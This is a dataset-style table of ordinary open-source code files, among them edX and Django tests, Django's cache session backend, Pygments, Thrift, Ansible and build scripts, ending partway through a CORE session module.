repo_name (stringlengths 5–100) | path (stringlengths 4–375) | copies (stringclasses, 991 values) | size (stringlengths 4–7) | content (stringlengths 666–1M) | license (stringclasses, 15 values)
---|---|---|---|---|---
mitocw/edx-platform | common/lib/xmodule/xmodule/tests/test_library_root.py | 4 | 3363 | # -*- coding: utf-8 -*-
"""
Basic unit tests for LibraryRoot
"""
from mock import patch
from six.moves import range
from web_fragments.fragment import Fragment
from xblock.runtime import Runtime as VanillaRuntime
from xmodule.modulestore.tests.factories import ItemFactory, LibraryFactory
from xmodule.modulestore.tests.utils import MixedSplitTestCase
from xmodule.x_module import AUTHOR_VIEW
dummy_render = lambda block, _: Fragment(block.data) # pylint: disable=invalid-name
@patch(
'xmodule.modulestore.split_mongo.caching_descriptor_system.CachingDescriptorSystem.render', VanillaRuntime.render
)
@patch('xmodule.html_module.HtmlBlock.author_view', dummy_render, create=True)
@patch('xmodule.html_module.HtmlBlock.has_author_view', True, create=True)
@patch('xmodule.x_module.DescriptorSystem.applicable_aside_types', lambda self, block: [])
class TestLibraryRoot(MixedSplitTestCase):
"""
Basic unit tests for LibraryRoot (library_root_xblock.py)
"""
def test_library_author_view(self):
"""
Test that LibraryRoot.author_view can run and includes content from its
children.
We have to patch the runtime (module system) in order to be able to
render blocks in our test environment.
"""
message = u"Hello world"
library = LibraryFactory.create(modulestore=self.store)
# Add one HTML block to the library:
ItemFactory.create(
category="html",
parent_location=library.location,
user_id=self.user_id,
publish_item=False,
modulestore=self.store,
data=message
)
library = self.store.get_library(library.location.library_key)
context = {'reorderable_items': set(), }
# Patch the HTML block to always render "Hello world"
result = library.render(AUTHOR_VIEW, context)
self.assertIn(message, result.content)
def test_library_author_view_with_paging(self):
"""
Test that LibraryRoot.author_view can apply paging
We have to patch the runtime (module system) in order to be able to
render blocks in our test environment.
"""
library = LibraryFactory.create(modulestore=self.store)
# Add five HTML blocks to the library:
blocks = [
ItemFactory.create(
category="html",
parent_location=library.location,
user_id=self.user_id,
publish_item=False,
modulestore=self.store,
data="HtmlBlock" + str(i)
)
for i in range(5)
]
library = self.store.get_library(library.location.library_key)
def render_and_check_contents(page, page_size):
""" Renders block and asserts on returned content """
context = {'reorderable_items': set(), 'paging': {'page_number': page, 'page_size': page_size}}
expected_blocks = blocks[page_size * page:page_size * (page + 1)]
result = library.render(AUTHOR_VIEW, context)
for expected_block in expected_blocks:
self.assertIn(expected_block.data, result.content)
render_and_check_contents(0, 3)
render_and_check_contents(1, 3)
render_and_check_contents(0, 2)
render_and_check_contents(1, 2)
| agpl-3.0 |
jinxiaoye1987/RyzomCore | nel/tools/build_gamedata/processes/zone_light/1_export.py | 3 | 1955 | #!/usr/bin/python
#
# \file 1_export.py
# \brief Export zone_light
# \date 2009-03-11-13-45-GMT
# \author Jan Boon (Kaetemi)
# Python port of game data build pipeline.
# Export zone_light
#
# NeL - MMORPG Framework <http://dev.ryzom.com/projects/nel/>
# Copyright (C) 2010 Winch Gate Property Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import time, sys, os, shutil, subprocess, distutils.dir_util
sys.path.append("../../configuration")
if os.path.isfile("log.log"):
os.remove("log.log")
log = open("log.log", "w")
from scripts import *
from buildsite import *
from process import *
from tools import *
from directories import *
printLog(log, "")
printLog(log, "-------")
printLog(log, "--- Export zone_light")
printLog(log, "-------")
printLog(log, time.strftime("%Y-%m-%d %H:%MGMT", time.gmtime(time.time())))
printLog(log, "")
# Find tools
#TgaToDds = findTool(log, ToolDirectories, TgaToDdsTool, ToolSuffix)
printLog(log, "")
# Export zone_light water maps
printLog(log, ">>> Export zone_light water maps <<<")
srcDir = ExportBuildDirectory + "/" + ZoneLightWaterShapesLightedExportDirectory
mkPath(log, srcDir)
for dir in WaterMapSourceDirectories:
destDir = DatabaseDirectory + "/" + dir
mkPath(log, destDir)
copyFilesExtNoTreeIfNeeded(log, srcDir, destDir, ".tga")
printLog(log, "")
log.close()
# end of file
| agpl-3.0 |
mikica1986vee/Godot_android_tegra_fallback | platform/haiku/detect.py | 13 | 1652 | import os
import sys
def is_active():
return True
def get_name():
return "Haiku"
def can_build():
if (os.name != "posix"):
return False
if (sys.platform == "darwin"):
return False
return True
def get_opts():
return [
('debug_release', 'Add debug symbols to release version','no')
]
def get_flags():
return [
('builtin_zlib', 'no')
]
def configure(env):
is64 = sys.maxsize > 2**32
if (env["bits"]=="default"):
if (is64):
env["bits"]="64"
else:
env["bits"]="32"
env.Append(CPPPATH = ['#platform/haiku'])
env["CC"] = "gcc"
env["CXX"] = "g++"
if (env["target"]=="release"):
if (env["debug_release"]=="yes"):
env.Append(CCFLAGS=['-g2'])
else:
env.Append(CCFLAGS=['-O3','-ffast-math'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])
#env.Append(CCFLAGS=['-DFREETYPE_ENABLED'])
env.Append(CPPFLAGS = ['-DGLEW_ENABLED', '-DOPENGL_ENABLED', '-DMEDIA_KIT_ENABLED'])
env.Append(CPPFLAGS = ['-DUNIX_ENABLED', '-DGLES2_ENABLED', '-DGLES_OVER_GL'])
env.Append(LIBS = ['be', 'game', 'media', 'network', 'bnetapi', 'z', 'GL', 'GLEW'])
import methods
env.Append(BUILDERS = {'GLSL120' : env.Builder(action = methods.build_legacygl_headers, suffix = 'glsl.h',src_suffix = '.glsl')})
env.Append(BUILDERS = {'GLSL' : env.Builder(action = methods.build_glsl_headers, suffix = 'glsl.h',src_suffix = '.glsl')})
env.Append(BUILDERS = {'GLSL120GLES' : env.Builder(action = methods.build_gles2_headers, suffix = 'glsl.h',src_suffix = '.glsl')})
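# Illustrative invocation (assumed SCons command line, not part of the
# original file):
#   scons platform=haiku target=release debug_release=yes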
| mit |
emineKoc/WiseWit | wisewit_front_end/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/scanner.py | 135 | 3114 | # -*- coding: utf-8 -*-
"""
pygments.scanner
~~~~~~~~~~~~~~~~
This library implements a regex-based scanner. Some languages
like Pascal are easy to parse but have some keywords that
depend on the context. Because of this it's impossible to lex
that just by using a regular expression lexer like the
`RegexLexer`.
Have a look at the `DelphiLexer` to get an idea of how to use
this scanner.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
class EndOfText(RuntimeError):
"""
Raise if end of text is reached and the user
tried to call a match function.
"""
class Scanner(object):
"""
Simple scanner
All method patterns are regular expression strings (not
compiled expressions!)
"""
def __init__(self, text, flags=0):
"""
:param text: The text which should be scanned
:param flags: default regular expression flags
"""
self.data = text
self.data_length = len(text)
self.start_pos = 0
self.pos = 0
self.flags = flags
self.last = None
self.match = None
self._re_cache = {}
def eos(self):
"""`True` if the scanner reached the end of text."""
return self.pos >= self.data_length
eos = property(eos, doc=eos.__doc__)
def check(self, pattern):
"""
Apply `pattern` on the current position and return
the match object. (Doesn't touch pos). Use this for
lookahead.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
return self._re_cache[pattern].match(self.data, self.pos)
def test(self, pattern):
"""Apply a pattern on the current position and check
if it matches. Doesn't touch pos."""
return self.check(pattern) is not None
def scan(self, pattern):
"""
Scan the text for the given pattern and update pos/match
and related fields. The return value is a boolean that
indicates if the pattern matched. The matched value is
stored on the instance as ``match``, the last value is
stored as ``last``. ``start_pos`` is the position of the
pointer before the pattern was matched, ``pos`` is the
end position.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
self.last = self.match
m = self._re_cache[pattern].match(self.data, self.pos)
if m is None:
return False
self.start_pos = m.start()
self.pos = m.end()
self.match = m.group()
return True
def get_char(self):
"""Scan exactly one char."""
self.scan('.')
def __repr__(self):
return '<%s %d/%d>' % (
self.__class__.__name__,
self.pos,
self.data_length
)
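# Illustrative usage sketch (not part of the original module; the pattern
# and input below are hypothetical):
#
#   s = Scanner('program Test;')
#   while not s.eos:
#       if s.scan(r'\w+'):
#           print s.match        # 'program', then 'Test'
#       else:
#           s.get_char()         # consume one char (whitespace, ';', ...)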
| gpl-3.0 |
Lujeni/ansible | lib/ansible/modules/cloud/vultr/_vultr_plan_facts.py | 21 | 3981 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, Yanis Guenane <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_plan_facts
deprecated:
removed_in: '2.13'
why: Deprecated in favour of C(_info) module.
alternative: Use M(vultr_plan_info) instead.
short_description: Gather facts about the Vultr plans available.
description:
- Gather facts about plans available to boot servers.
version_added: "2.7"
author: "Yanis Guenane (@Spredzy)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Gather Vultr plans facts
local_action:
module: vultr_plan_facts
- name: Print the gathered facts
debug:
var: ansible_facts.vultr_plan_facts
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modifications
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: str
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_retry_max_delay:
description: Exponential backoff delay in seconds between retries up to this max delay value.
returned: success
type: int
sample: 12
version_added: '2.9'
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: str
sample: "https://api.vultr.com"
vultr_plan_facts:
description: Response from Vultr API
returned: success
type: complex
contains:
plan:
description: List of the plans available.
returned: success
type: list
sample: [{
"available_locations": [
1
],
"bandwidth": 40.0,
"bandwidth_gb": 40960,
"disk": 110,
"id": 118,
"name": "32768 MB RAM,110 GB SSD,40.00 TB BW",
"plan_type": "DEDICATED",
"price_per_month": 240.0,
"ram": 32768,
"vcpu_count": 8,
"windows": false
}]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrPlanFacts(Vultr):
def __init__(self, module):
super(AnsibleVultrPlanFacts, self).__init__(module, "vultr_plan_facts")
self.returns = {
"VPSPLANID": dict(key='id', convert_to='int'),
"available_locations": dict(),
"bandwidth": dict(convert_to='float'),
"bandwidth_gb": dict(convert_to='int'),
"disk": dict(convert_to='int'),
"name": dict(),
"plan_type": dict(),
"price_per_month": dict(convert_to='float'),
"ram": dict(convert_to='int'),
"vcpu_count": dict(convert_to='int'),
"windows": dict(convert_to='bool')
}
def get_plans(self):
return self.api_query(path="/v1/plans/list")
def parse_plans_list(plans_list):
return [plan for id, plan in plans_list.items()]
def main():
argument_spec = vultr_argument_spec()
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
plan_facts = AnsibleVultrPlanFacts(module)
result = plan_facts.get_result(parse_plans_list(plan_facts.get_plans()))
ansible_facts = {
'vultr_plan_facts': result['vultr_plan_facts']
}
module.exit_json(ansible_facts=ansible_facts, **result)
if __name__ == '__main__':
main()
| gpl-3.0 |
runekaagaard/django-contrib-locking | tests/view_tests/tests/test_csrf.py | 47 | 2663 | from django.test import TestCase, override_settings, Client
from django.utils.translation import override
@override_settings(ROOT_URLCONF="view_tests.urls")
class CsrfViewTests(TestCase):
def setUp(self):
super(CsrfViewTests, self).setUp()
self.client = Client(enforce_csrf_checks=True)
@override_settings(
USE_I18N=True,
MIDDLEWARE_CLASSES=(
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
)
def test_translation(self):
"""
Test that an invalid request is rejected with a localized error message.
"""
response = self.client.post('/')
self.assertContains(response, "Forbidden", status_code=403)
self.assertContains(response,
"CSRF verification failed. Request aborted.",
status_code=403)
with self.settings(LANGUAGE_CODE='nl'), override('en-us'):
response = self.client.post('/')
self.assertContains(response, "Verboden", status_code=403)
self.assertContains(response,
"CSRF-verificatie mislukt. Verzoek afgebroken.",
status_code=403)
@override_settings(
SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTO', 'https')
)
def test_no_referer(self):
"""
Referer header is strictly checked for POST over HTTPS. Trigger the
exception by sending an incorrect referer.
"""
response = self.client.post('/', HTTP_X_FORWARDED_PROTO='https')
self.assertContains(response,
"You are seeing this message because this HTTPS "
"site requires a 'Referer header' to be "
"sent by your Web browser, but none was sent.",
status_code=403)
def test_no_cookies(self):
"""
The CSRF cookie is checked for POST. Failure to send this cookie should
provide a nice error message.
"""
response = self.client.post('/')
self.assertContains(response,
"You are seeing this message because this site "
"requires a CSRF cookie when submitting forms. "
"This cookie is required for security reasons, to "
"ensure that your browser is not being hijacked "
"by third parties.",
status_code=403)
| bsd-3-clause |
st135yle/django-site | dbenv/lib/python3.4/site-packages/django/contrib/sessions/backends/cache.py | 117 | 2766 | from django.conf import settings
from django.contrib.sessions.backends.base import (
CreateError, SessionBase, UpdateError,
)
from django.core.cache import caches
from django.utils.six.moves import range
KEY_PREFIX = "django.contrib.sessions.cache"
class SessionStore(SessionBase):
"""
A cache-based session store.
"""
cache_key_prefix = KEY_PREFIX
def __init__(self, session_key=None):
self._cache = caches[settings.SESSION_CACHE_ALIAS]
super(SessionStore, self).__init__(session_key)
@property
def cache_key(self):
return self.cache_key_prefix + self._get_or_create_session_key()
def load(self):
try:
session_data = self._cache.get(self.cache_key)
except Exception:
# Some backends (e.g. memcache) raise an exception on invalid
# cache keys. If this happens, reset the session. See #17810.
session_data = None
if session_data is not None:
return session_data
self._session_key = None
return {}
def create(self):
# Because a cache can fail silently (e.g. memcache), we don't know if
# we are failing to create a new session because of a key collision or
# because the cache is missing. So we try for a (large) number of times
# and then raise an exception. That's the risk you shoulder if using
# cache backing.
for i in range(10000):
self._session_key = self._get_new_session_key()
try:
self.save(must_create=True)
except CreateError:
continue
self.modified = True
return
raise RuntimeError(
"Unable to create a new session key. "
"It is likely that the cache is unavailable.")
def save(self, must_create=False):
if self.session_key is None:
return self.create()
if must_create:
func = self._cache.add
elif self._cache.get(self.cache_key) is not None:
func = self._cache.set
else:
raise UpdateError
result = func(self.cache_key,
self._get_session(no_load=must_create),
self.get_expiry_age())
if must_create and not result:
raise CreateError
def exists(self, session_key):
return session_key and (self.cache_key_prefix + session_key) in self._cache
def delete(self, session_key=None):
if session_key is None:
if self.session_key is None:
return
session_key = self.session_key
self._cache.delete(self.cache_key_prefix + session_key)
@classmethod
def clear_expired(cls):
pass
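# Minimal usage sketch (illustrative; assumes Django settings with a cache
# backend and SESSION_CACHE_ALIAS configured):
#
#   store = SessionStore()
#   store.create()               # picks an unused random key and saves
#   store['user_id'] = 42
#   store.save()
#   SessionStore(session_key=store.session_key).load()  # {'user_id': 42}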
| mit |
damonkohler/sl4a | python/src/Lib/plat-irix5/FILE.py | 66 | 4038 | # Generated by h2py from /usr/include/sys/file.h
from warnings import warnpy3k
warnpy3k("the FILE module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
# Included from sys/types.h
# Included from sgidefs.h
_MIPS_ISA_MIPS1 = 1
_MIPS_ISA_MIPS2 = 2
_MIPS_ISA_MIPS3 = 3
_MIPS_ISA_MIPS4 = 4
_MIPS_SIM_ABI32 = 1
_MIPS_SIM_NABI32 = 2
_MIPS_SIM_ABI64 = 3
P_MYID = (-1)
P_MYHOSTID = (-1)
# Included from sys/bsd_types.h
# Included from sys/mkdev.h
ONBITSMAJOR = 7
ONBITSMINOR = 8
OMAXMAJ = 0x7f
OMAXMIN = 0xff
NBITSMAJOR = 14
NBITSMINOR = 18
MAXMAJ = 0x1ff
MAXMIN = 0x3ffff
OLDDEV = 0
NEWDEV = 1
MKDEV_VER = NEWDEV
def major(dev): return __major(MKDEV_VER, dev)
def minor(dev): return __minor(MKDEV_VER, dev)
# Included from sys/select.h
FD_SETSIZE = 1024
NBBY = 8
# Included from sys/sema.h
HP_NOPOLICY = 0
HP_ADDOFF = 1
HP_MULOFF = 2
SEMA_NAMSZ = 8
SEMA_NOHIST = 0x1
SEMA_LIFO = 0x2
SEMA_MUTEX = 0x4
SEMA_METER = 0x8
SEMAOP_PSEMA = 1
SEMAOP_VSEMA = 2
SEMAOP_CPSEMA = 3
SEMAOP_CVSEMA = 4
SEMAOP_WSEMA = 5
SEMAOP_UNSEMA = 6
SEMAOP_INIT = 7
SEMAOP_FREE = 8
SSOP_PHIT = 1
SSOP_PSLP = 2
SSOP_PWAKE = 6
SSOP_PRESIG = 7
SSOP_POSTSIG = 8
SSOP_VNOWAKE = 3
SSOP_VWAKE = 4
SSOP_CPHIT = 1
SSOP_CPMISS = 5
SSOP_CVNOWAKE = 3
SSOP_CVWAKE = 4
SSOP_WMISS = 5
SSOP_WWAKE = 4
SSOP_RMV = 9
TZERO = 10
SEMA_NOP = 0
SEMA_WAKE = 1
SEMA_VSEMA = 2
SEMA_SPINOP = 3
MR_ACCESS = 0x1
MR_UPDATE = 0x2
def cv_signal(cv): return cvsema(cv);
def cv_destroy(cv): return freesema(cv)
def mutex_enter(m): return psema(m, PZERO | PNOSTOP)
def mutex_exit(m): return vsema(m)
def mutex_destroy(m): return freesema(m)
def MUTEX_HELD(m): return (ownsema(m))
def MUTEX_HELD(m): return (1)
RW_READER = MR_ACCESS
RW_WRITER = MR_UPDATE
def rw_exit(r): return mrunlock(r)
def rw_tryupgrade(r): return cmrpromote(r)
def rw_downgrade(r): return mrdemote(r)
def rw_destroy(r): return mrfree(r)
def RW_WRITE_HELD(r): return ismrlocked(r, MR_UPDATE)
def RW_READ_HELD(r): return ismrlocked(r, MR_ACCESS)
# Included from sys/splock.h
SPLOCKNAMSIZ = 8
SPLOCK_NONE = 0
SPLOCK_SOFT = 1
SPLOCK_HARD = 2
OWNER_NONE = -1
MAP_LOCKID = 0
SPLOCK_MAX = (96*1024)
SPLOCK_MAX = 32768
MIN_POOL_SIZE = 256
MAX_POOL_SIZE = 16384
DEF_SEMA_POOL = 8192
DEF_VNODE_POOL = 1024
DEF_FILE_POOL = 1024
def ownlock(x): return 1
def splock(x): return 1
def io_splock(x): return 1
def apvsema(x): return vsema(x)
def apcpsema(x): return cpsema(x)
def apcvsema(x): return cvsema(x)
def mp_mrunlock(a): return mrunlock(a)
def apvsema(x): return 0
def apcpsema(x): return 1
def apcvsema(x): return 0
def mp_mrunlock(a): return 0
# Included from sys/fcntl.h
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FNONBLOCK = 0x80
FASYNC = 0x1000
FNONBLK = FNONBLOCK
FDIRECT = 0x8000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_NDELAY = 0x04
O_APPEND = 0x08
O_SYNC = 0x10
O_NONBLOCK = 0x80
O_DIRECT = 0x8000
O_CREAT = 0x100
O_TRUNC = 0x200
O_EXCL = 0x400
O_NOCTTY = 0x800
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_GETLK = 14
F_SETLK = 6
F_SETLKW = 7
F_CHKFL = 8
F_ALLOCSP = 10
F_FREESP = 11
F_SETBSDLK = 12
F_SETBSDLKW = 13
F_DIOINFO = 30
F_FSGETXATTR = 31
F_FSSETXATTR = 32
F_GETLK64 = 33
F_SETLK64 = 34
F_SETLKW64 = 35
F_ALLOCSP64 = 36
F_FREESP64 = 37
F_GETBMAP = 38
F_FSSETDM = 39
F_RSETLK = 20
F_RGETLK = 21
F_RSETLKW = 22
F_GETOWN = 23
F_SETOWN = 24
F_O_GETLK = 5
F_O_GETOWN = 10
F_O_SETOWN = 11
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
O_ACCMODE = 3
FD_CLOEXEC = 1
FD_NODUP_FORK = 4
FMASK = 0x90FF
FOPEN = 0xFFFFFFFF
FREAD = 0x01
FWRITE = 0x02
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FNONBLOCK = 0x80
FASYNC = 0x1000
FNONBLK = FNONBLOCK
FDIRECT = 0x8000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
IRIX4_FASYNC = 0x40
FMARK = 0x4000
FDEFER = 0x2000
FINPROGRESS = 0x0400
FINVIS = 0x0100
FNMFS = 0x2000
FCLOSEXEC = 001
FDSHD = 0x0001
FDNOMARK = 0x0002
FDIGNPROGRESS = 0x0004
LOCK_SH = 1
LOCK_EX = 2
LOCK_NB = 4
LOCK_UN = 8
F_OK = 0
X_OK = 1
W_OK = 2
R_OK = 4
L_SET = 0
L_INCR = 1
L_XTND = 2
| apache-2.0 |
zonesan/shadowsocks-android | gfwlist/gen.py | 304 | 1535 | #!/usr/bin/python
# -*- encoding: utf8 -*-
import itertools
import math
import sys
import IPy
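# Input is read from stdin in the RIR "delegated" statistics format; an
# illustrative (pipe-separated) line looks like:
#
#   apnic|CN|ipv4|1.0.1.0|256|20110414|allocated
#
# where field 4 is the first address of the block and field 5 the number
# of addresses, which main() converts to a prefix length below.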
def main():
china_list_set = IPy.IPSet()
for line in sys.stdin:
line_params = line.split("|")
if len(line_params) < 5 or line_params[2] != "ipv4" or line_params[1] != "CN":
continue
ip_addr = line_params[3]
ip_length = float(line_params[4])
ip_mask = 32 - int(math.ceil(math.log(ip_length, 2)))
china_list_set.add(IPy.IP("%s/%d" % (ip_addr, ip_mask)))
# Add reserved/private (internal) address ranges
internal_list = IPy.IPSet(map(IPy.IP, [
"0.0.0.0/8",
"10.0.0.0/8",
"100.64.0.0/10",
"112.124.47.0/24",
"114.114.114.0/24",
"127.0.0.0/8",
"169.254.0.0/16",
"172.16.0.0/12",
"192.0.0.0/29",
"192.0.2.0/24",
"192.88.99.0/24",
"192.168.0.0/16",
"198.18.0.0/15",
"198.51.100.0/24",
"203.0.113.0/24",
"224.0.0.0/4",
"240.0.0.0/4",
]))
china_list_set += internal_list
all = china_list_set
# Invert (start from the full IPv4 space)
# all = IPy.IPSet([IPy.IP("0.0.0.0/0")])
# Drop every isolated /24 (class C) block
# for ip in china_list_set:
# all.discard(ip)
# filter = itertools.ifilter(lambda x: len(x) <= 65536, all)
# for ip in filter:
# all.discard(ip)
# all.add(IPy.IP(ip.strNormal(0)).make_net('255.255.0.0'))
# Print the result
for ip in all:
print '<item>' + str(ip) + '</item>'
if __name__ == "__main__":
main()
| gpl-3.0 |
jounex/hue | desktop/core/ext-py/thrift-0.9.1/src/transport/THttpClient.py | 157 | 4221 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import httplib
import os
import socket
import sys
import urllib
import urlparse
import warnings
from cStringIO import StringIO
from TTransport import *
class THttpClient(TTransportBase):
"""Http implementation of TTransport base."""
def __init__(self, uri_or_host, port=None, path=None):
"""THttpClient supports two different types constructor parameters.
THttpClient(host, port, path) - deprecated
THttpClient(uri)
Only the second supports https.
"""
if port is not None:
warnings.warn(
"Please use the THttpClient('http://host:port/path') syntax",
DeprecationWarning,
stacklevel=2)
self.host = uri_or_host
self.port = port
assert path
self.path = path
self.scheme = 'http'
else:
parsed = urlparse.urlparse(uri_or_host)
self.scheme = parsed.scheme
assert self.scheme in ('http', 'https')
if self.scheme == 'http':
self.port = parsed.port or httplib.HTTP_PORT
elif self.scheme == 'https':
self.port = parsed.port or httplib.HTTPS_PORT
self.host = parsed.hostname
self.path = parsed.path
if parsed.query:
self.path += '?%s' % parsed.query
self.__wbuf = StringIO()
self.__http = None
self.__timeout = None
self.__custom_headers = None
def open(self):
if self.scheme == 'http':
self.__http = httplib.HTTP(self.host, self.port)
else:
self.__http = httplib.HTTPS(self.host, self.port)
def close(self):
self.__http.close()
self.__http = None
def isOpen(self):
return self.__http is not None
def setTimeout(self, ms):
if not hasattr(socket, 'getdefaulttimeout'):
raise NotImplementedError
if ms is None:
self.__timeout = None
else:
self.__timeout = ms / 1000.0
def setCustomHeaders(self, headers):
self.__custom_headers = headers
def read(self, sz):
return self.__http.file.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def __withTimeout(f):
def _f(*args, **kwargs):
orig_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(args[0].__timeout)
result = f(*args, **kwargs)
socket.setdefaulttimeout(orig_timeout)
return result
return _f
def flush(self):
if self.isOpen():
self.close()
self.open()
# Pull data out of buffer
data = self.__wbuf.getvalue()
self.__wbuf = StringIO()
# HTTP request
self.__http.putrequest('POST', self.path)
# Write headers
self.__http.putheader('Host', self.host)
self.__http.putheader('Content-Type', 'application/x-thrift')
self.__http.putheader('Content-Length', str(len(data)))
if not self.__custom_headers or 'User-Agent' not in self.__custom_headers:
user_agent = 'Python/THttpClient'
script = os.path.basename(sys.argv[0])
if script:
user_agent = '%s (%s)' % (user_agent, urllib.quote(script))
self.__http.putheader('User-Agent', user_agent)
if self.__custom_headers:
for key, val in self.__custom_headers.iteritems():
self.__http.putheader(key, val)
self.__http.endheaders()
# Write payload
self.__http.send(data)
# Get reply to flush the request
self.code, self.message, self.headers = self.__http.getreply()
# Decorate if we know how to timeout
if hasattr(socket, 'getdefaulttimeout'):
flush = __withTimeout(flush)
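# Illustrative usage sketch (hypothetical URI and payload; not part of the
# original module):
#
#   transport = THttpClient('http://thrift.example.com:9090/service')
#   transport.setTimeout(5000)     # milliseconds
#   transport.open()
#   transport.write(payload)       # buffered in memory
#   transport.flush()              # POSTs the buffered payload
#   reply = transport.read(4096)
#   transport.close()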
| apache-2.0 |
sivareddyg/UDepLambda | scripts/graphquestions/split_data.py | 1 | 1167 | import sys
import json
import random
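# Usage sketch (illustrative): "python split_data.py train.json 30" writes
# train.json.70 and train.json.30, grouping sentences by sparql_query so a
# query never appears in both splits.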
if len(sys.argv) > 2:
dev_split_size = int(sys.argv[2])
else:
dev_split_size = 30
training_file = open(sys.argv[1] + ".%d" %(100 - dev_split_size), "w")
dev_file = open(sys.argv[1] + ".%d" %(dev_split_size), "w")
sys.stderr.write("Creating training and dev splits\n");
sparql_to_sent = {}
for line in open(sys.argv[1]):
sent = json.loads(line)
query = sent['sparql_query']
if query not in sparql_to_sent:
sparql_to_sent[query] = []
sparql_to_sent[query].append(line)
data = sparql_to_sent.items()
random.seed(1)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
training_data_size = (100 - dev_split_size) * len(data) / 100
training_data = []
for query in data[:training_data_size]:
training_data += query[1]
random.shuffle(training_data)
dev_data = []
for query in data[training_data_size:]:
dev_data += query[1]
random.shuffle(dev_data)
for sent in training_data:
training_file.write(sent)
training_file.close()
for sent in dev_data:
dev_file.write(sent)
dev_file.close()
| apache-2.0 |
luiscarlosgph/nas | env/lib/python2.7/site-packages/django/contrib/gis/db/models/lookups.py | 48 | 1423 | from django.db.models.lookups import Lookup
from django.db.models.sql.expressions import SQLEvaluator
class GISLookup(Lookup):
def as_sql(self, qn, connection):
from django.contrib.gis.db.models.sql import GeoWhereNode
# We use the same approach as was used by GeoWhereNode. It would
# be a good idea to upgrade GIS to use similar code that is used
# for other lookups.
if isinstance(self.rhs, SQLEvaluator):
# Make sure the F Expression destination field exists, and
# set an `srid` attribute with the same as that of the
# destination.
geo_fld = GeoWhereNode._check_geo_field(self.rhs.opts, self.rhs.expression.name)
if not geo_fld:
raise ValueError('No geographic field found in expression.')
self.rhs.srid = geo_fld.srid
db_type = self.lhs.output_field.db_type(connection=connection)
params = self.lhs.output_field.get_db_prep_lookup(
self.lookup_name, self.rhs, connection=connection)
lhs_sql, lhs_params = self.process_lhs(qn, connection)
# lhs_params not currently supported.
assert not lhs_params
data = (lhs_sql, db_type)
spatial_sql, spatial_params = connection.ops.spatial_lookup_sql(
data, self.lookup_name, self.rhs, self.lhs.output_field, qn)
return spatial_sql, spatial_params + params
| mit |
Benocs/core | src/daemon/core/session.py | 1 | 45796 | #
# CORE
# Copyright (c)2010-2013 the Boeing Company.
# See the LICENSE file included in this distribution.
#
# authors: Tom Goff <[email protected]>
# Jeff Ahrenholz <[email protected]>
#
# Copyright (c) 2014 Benocs GmbH
#
# author: Robert Wuttke <[email protected]>
#
# See the LICENSE file included in this distribution.
#
'''
session.py: defines the Session class used by the core-daemon daemon program
that manages a CORE session.
'''
import os, sys, tempfile, shutil, shlex, atexit, gc, pwd
import threading, time, random
from core.api import coreapi
if os.uname()[0] == "Linux":
from core.netns import nodes
from core.netns.vnet import GreTapBridge
elif os.uname()[0] == "FreeBSD":
from core.bsd import nodes
from core.emane import emane
